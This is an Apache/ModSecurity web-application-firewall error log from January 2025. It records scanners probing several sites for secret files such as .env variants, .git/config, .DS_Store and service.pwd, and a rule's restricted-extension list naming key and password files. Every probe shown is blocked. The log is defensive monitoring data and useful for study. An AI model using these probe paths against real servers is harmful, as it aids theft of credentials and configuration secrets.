[Sun Jan 12 12:41:21.347722 2025] [:error] [pid 416207] [client 109.205.213.58:37358] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z4OqYXTQenmWZbzeIZp7OQAAAAU"]
[Sun Jan 12 12:41:21.348310 2025] [:error] [pid 416207] [client 109.205.213.58:37358] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z4OqYXTQenmWZbzeIZp7OQAAAAU"]
[Sun Jan 12 12:41:21.348739 2025] [:error] [pid 416207] [client 109.205.213.58:37358] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "Z4OqYXTQenmWZbzeIZp7OQAAAAU"]
[Sun Jan 12 12:41:21.680553 2025] [:error] [pid 416184] [client 109.205.213.58:37368] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z4OqYSrMBb5jmSOFZpL5OQAAAAA"]
[Sun Jan 12 12:41:21.681211 2025] [:error] [pid 416184] [client 109.205.213.58:37368] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z4OqYSrMBb5jmSOFZpL5OQAAAAA"]
[Sun Jan 12 12:41:21.681691 2025] [:error] [pid 416184] [client 109.205.213.58:37368] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "Z4OqYSrMBb5jmSOFZpL5OQAAAAA"]
[Sun Jan 12 12:41:22.021004 2025] [:error] [pid 416186] [client 109.205.213.58:37374] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z4OqYiRxjhQv01_So6u3JwAAAAI"]
[Sun Jan 12 12:41:22.021570 2025] [:error] [pid 416186] [client 109.205.213.58:37374] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z4OqYiRxjhQv01_So6u3JwAAAAI"]
[Sun Jan 12 12:41:22.022058 2025] [:error] [pid 416186] [client 109.205.213.58:37374] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/login/.env"] [unique_id "Z4OqYiRxjhQv01_So6u3JwAAAAI"]
[Sun Jan 12 12:41:23.703067 2025] [:error] [pid 416188] [client 109.205.213.58:37376] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z4OqY9oFLczISO4zxoBwCgAAAAQ"]
[Sun Jan 12 12:41:23.703663 2025] [:error] [pid 416188] [client 109.205.213.58:37376] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z4OqY9oFLczISO4zxoBwCgAAAAQ"]
[Sun Jan 12 12:41:23.704122 2025] [:error] [pid 416188] [client 109.205.213.58:37376] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "Z4OqY9oFLczISO4zxoBwCgAAAAQ"]
[Sun Jan 12 12:41:24.057341 2025] [:error] [pid 416187] [client 109.205.213.58:37386] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z4OqZPeUzzDyvBXMr_lI_AAAAAM"]
[Sun Jan 12 12:41:24.057959 2025] [:error] [pid 416187] [client 109.205.213.58:37386] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z4OqZPeUzzDyvBXMr_lI_AAAAAM"]
[Sun Jan 12 12:41:24.058452 2025] [:error] [pid 416187] [client 109.205.213.58:37386] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "Z4OqZPeUzzDyvBXMr_lI_AAAAAM"]
[Sun Jan 12 12:41:24.422851 2025] [authz_core:error] [pid 416185] [client 109.205.213.58:37394] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun Jan 12 12:41:24.770422 2025] [:error] [pid 416210] [client 109.205.213.58:37404] [client 109.205.213.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z4OqZPPAiWHeVRqEb61gVAAAAAY"]
[Sun Jan 12 12:41:24.770855 2025] [:error] [pid 416210] [client 109.205.213.58:37404] [client 109.205.213.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z4OqZPPAiWHeVRqEb61gVAAAAAY"]
[Sun Jan 12 12:41:24.771189 2025] [:error] [pid 416210] [client 109.205.213.58:37404] [client 109.205.213.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "Z4OqZPPAiWHeVRqEb61gVAAAAAY"]
[Wed Jan 15 06:34:56.122310 2025] [authz_core:error] [pid 483232] [client 147.182.200.94:40168] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Jan 15 06:34:57.690492 2025] [:error] [pid 483259] [client 147.182.200.94:40186] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z4dJAZpPu2zyxbex5Zbp4QAAAAE"]
[Wed Jan 15 06:34:57.690864 2025] [:error] [pid 483259] [client 147.182.200.94:40186] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z4dJAZpPu2zyxbex5Zbp4QAAAAE"]
[Wed Jan 15 06:34:57.691131 2025] [:error] [pid 483259] [client 147.182.200.94:40186] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "Z4dJAZpPu2zyxbex5Zbp4QAAAAE"]
[Wed Jan 15 06:34:58.161626 2025] [:error] [pid 483252] [client 147.182.200.94:40196] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4dJAg_HwyiYhzJGID0GXwAAAAg"]
[Wed Jan 15 06:34:58.161981 2025] [:error] [pid 483252] [client 147.182.200.94:40196] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4dJAg_HwyiYhzJGID0GXwAAAAg"]
[Wed Jan 15 06:34:58.162365 2025] [:error] [pid 483252] [client 147.182.200.94:40196] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4dJAg_HwyiYhzJGID0GXwAAAAg"]
[Wed Jan 15 06:34:58.627814 2025] [:error] [pid 483257] [client 147.182.200.94:40204] [client 147.182.200.94] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4dJAtt0wCUmDZVST0W-7AAAAAw"]
[Wed Jan 15 06:34:58.628075 2025] [:error] [pid 483257] [client 147.182.200.94:40204] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4dJAtt0wCUmDZVST0W-7AAAAAw"]
[Wed Jan 15 06:34:58.628285 2025] [:error] [pid 483257] [client 147.182.200.94:40204] [client 147.182.200.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4dJAtt0wCUmDZVST0W-7AAAAAw"]
[Wed Jan 15 06:36:26.039683 2025] [:error] [pid 483299] [client 3.108.243.190:49916] [client 3.108.243.190] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4dJWlr6rimmzaD00c3OawAAAAI"]
[Wed Jan 15 06:36:26.040480 2025] [:error] [pid 483299] [client 3.108.243.190:49916] [client 3.108.243.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4dJWlr6rimmzaD00c3OawAAAAI"]
[Wed Jan 15 06:36:26.041040 2025] [:error] [pid 483299] [client 3.108.243.190:49916] [client 3.108.243.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4dJWlr6rimmzaD00c3OawAAAAI"]
[Wed Jan 15 15:07:59.645836 2025] [:error] [pid 486747] [client 45.148.10.172:45256] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4fBPzU0JVKWBLdbK-asIgAAAAA"]
[Wed Jan 15 15:07:59.646940 2025] [:error] [pid 486747] [client 45.148.10.172:45256] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4fBPzU0JVKWBLdbK-asIgAAAAA"]
[Wed Jan 15 15:07:59.647528 2025] [:error] [pid 486747] [client 45.148.10.172:45256] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4fBPzU0JVKWBLdbK-asIgAAAAA"]
[Wed Jan 15 22:36:37.436411 2025] [:error] [pid 497005] [client 213.232.87.228:20181] [client 213.232.87.228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4gqZSZ47vPfg1ivW-AoYwAAAAo"]
[Wed Jan 15 22:36:37.437766 2025] [:error] [pid 497005] [client 213.232.87.228:20181] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4gqZSZ47vPfg1ivW-AoYwAAAAo"]
[Wed Jan 15 22:36:37.437930 2025] [:error] [pid 497005] [client 213.232.87.228:20181] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4gqZSZ47vPfg1ivW-AoYwAAAAo"]
[Wed Jan 15 22:36:37.499575 2025] [:error] [pid 489201] [client 213.232.87.228:50851] [client 213.232.87.228] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z4gqZYMhb0O0mPSQr8lPJwAAAAY"]
[Wed Jan 15 22:36:37.500060 2025] [:error] [pid 489201] [client 213.232.87.228:50851] [client 213.232.87.228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z4gqZYMhb0O0mPSQr8lPJwAAAAY"]
[Wed Jan 15 22:36:37.500339 2025] [:error] [pid 489201] [client 213.232.87.228:50851] [client 213.232.87.228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z4gqZYMhb0O0mPSQr8lPJwAAAAY"]
